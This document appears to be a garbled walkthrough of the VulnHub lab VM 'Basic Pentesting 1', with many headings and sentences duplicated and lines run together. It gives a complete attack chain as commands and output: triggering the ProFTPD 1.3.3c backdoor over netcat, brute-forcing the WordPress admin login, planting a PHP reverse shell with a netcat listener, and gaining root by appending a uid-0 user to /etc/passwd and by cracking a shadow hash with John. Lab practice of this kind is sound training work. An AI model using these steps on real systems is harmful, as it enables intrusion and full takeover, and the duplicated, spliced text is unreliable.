VM : BasicPentesting1
Download Link : https://www.vulnhub.com/entry/basic-pentesting-1,216/
Start the VM and get the IP of VM :
At above list 192.168.1.15 is our VM ip address. At above list 192.168.1.15 is our VM ip address.
At above list 192.168.1.15 is our VM ip address.
Scanning network :
2nd Method: By cracking password of existing users :
Download Link : https://www.vulnhub.com/entry/basic-pentesting-1,216/
Start the VM and get the IP of VM :
$ nmap -sP 192.168.1.0/24
Nmap scan report for 192.168.1.1
Host is up (0.00060s latency).
Nmap scan report for 192.168.1.2
Host is up (0.000024s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0014s latency).
Nmap scan report for 192.168.1.9
Host is up (0.11s latency).
Nmap scan report for 192.168.1.10
Host is up (0.0015s latency).
Nmap scan report for 192.168.1.15
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.100
Host is up (0.00080s latency).
At above list 192.168.1.15 is our VM ip address. At above list 192.168.1.15 is our VM ip address.
At above list 192.168.1.15 is our VM ip address.
Scanning network :
$ nmap -sV 192.168.1.15
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
Nmap scan report for 192.168.1.15
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds
Nothing unusual, but a quick search for ProFTPD 1.3.3c revealed that it is backdoored version of FTP server. To exploit this backdoor we just need to connect to port 21 with netcat and sends the trigger "HELP ACIDBITCHEZ".
Reconn for Web Applications :
Using dirb :
At above scan we find that there is a hidden wordpress blog at http://192.168.1.15/secret/, lets check it out.
This blog will redirect to http://vtcsec/secret/, so we add vtcsec into our /etc/hosts file.
Scan wordpress blog with wpscan :
Getting a shell using php reverse shell code :
Link for php reverse shell : Github Link
Change the port number and IP address on script, then put it to the index.php file on wordpress.
Now start netcat listener
Getting root privilege :
1st Method: By overwriting the /etc/passwd file :
$ nc 192.168.1.15 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
HELP ACIDBITCHEZ
uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
python -c 'import pty;pty.spawn("/bin/bash")';
$ nc 192.168.1.15 21
python -c 'import pty;pty.spawn("/bin/bash")';
root@vtcsec:/#
Reconn for Web Applications :
Using dirb :
$ dirb http://192.168.1.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 28 19:16:46 2019
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.1.15/secret/
+ http://192.168.1.15/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.1.15/secret/ ----
+ http://192.168.1.15/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/
==> DIRECTORY: http://192.168.1.15/secret/wp-includes/
+ http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
+ http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes/
+ http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user/
---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
+ http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads/
---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
+ http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
+ http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
+ http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
+ http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Sep 28 19:17:13 2019
At above scan we find that there is a hidden wordpress blog at http://192.168.1.15/secret/, lets check it out.
This blog will redirect to http://vtcsec/secret/, so we add vtcsec into our /etc/hosts file.
sudo echo "vtcsec 192.168.1.15" >> /etc/hostsNow the wordpress blog will properly open.
Scan wordpress blog with wpscan :
$ wpscan --url http://192.168.1.15/secret/ --enumerate u
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ _
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.1
WPScan.io - Online WordPress Vulnerability Scanner
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.1.15/secret/
[+] Started: Sun Sep 29 05:46:41 2019
Interesting Finding(s):
[+] http://192.168.1.15/secret/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.15/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
[+] Finished: Sun Sep 29 05:46:42 2019
[+] Requests Done: 21
[+] Cached Requests: 29
[+] Data Sent: 5.049 KB
[+] Data Received: 10.292 KB
[+] Memory used: 90.594 MB
[+] Elapsed time: 00:00:00
wpscan -U admin -P common.txt --url http://192.168.1.12/secret/
.....
[i] Valid Combinations Found:
| Username: admin, Password: admin
.....
Getting a shell using php reverse shell code :
Link for php reverse shell : Github Link
Change the port number and IP address on script, then put it to the index.php file on wordpress.
Now start netcat listener
$ nc -lvvp 1234
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:46:01 up 2 min, 0 users, load average: 0.58, 0.60, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Getting root privilege :
1st Method: By overwriting the /etc/passwd file :
As we can see that /etc/passwd is permitted to read-write for all users.
$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd
So by appending a new user who has root privilege assigned, into the /etc/passwd file with password we are able to get root shell.
Preparing new user to append on file :
Preparing new user to append on file :
The root user entry is look like this :
root:x:0:0:root:/root:/bin/bashwhere the different columns are as follows :
Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_Directory : Command_ShellAt the place of password there is x which means the password is stored on the /etc/shadow file. Now lets create encrypted password for new user :
$ openssl passwd -1 -salt hack password123 $1$hack$MLgkAESrYp7kzYz0Ex2fV/Where :
- -1 : md5 based password algorithm (other options are -5 for SHA256 and -6 for SHA512 )
- -salt : salt key, which is "hack"
- password is password123
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
$ su - newroot
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash");'
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123
root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#
2nd Method: By cracking password of existing users :
This method only works if the /etc/shadow file is world readable, which is not allowed by default. But in this case we can read /etc/shadow file
$ cat /etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::
The shadow file stores actual password in encrypted format for user's account with additional properties related to user password i.e. it stores secure user account information.
As we can see the user marlinspike have encrypted password :
As we can see the user marlinspike have encrypted password :
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::Now save the above line onto the file pass.txt and then we try to crack the hashed password john (jtr).
root@ae3e2e69805d:~/# john pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ae3e2e69805d:~/# john --show pass.txt
marlinspike:marlinspike:17484:0:99999:7:::
1 password hash cracked, 0 left
$ su - marlinspike
su: must be run from a terminal
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike
su - marlinspike
Password: marlinspike
marlinspike@vtcsec:~$ whoami
whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike
root@vtcsec:/home/marlinspike# whoami
whoami
root
root@vtcsec:/home/marlinspike#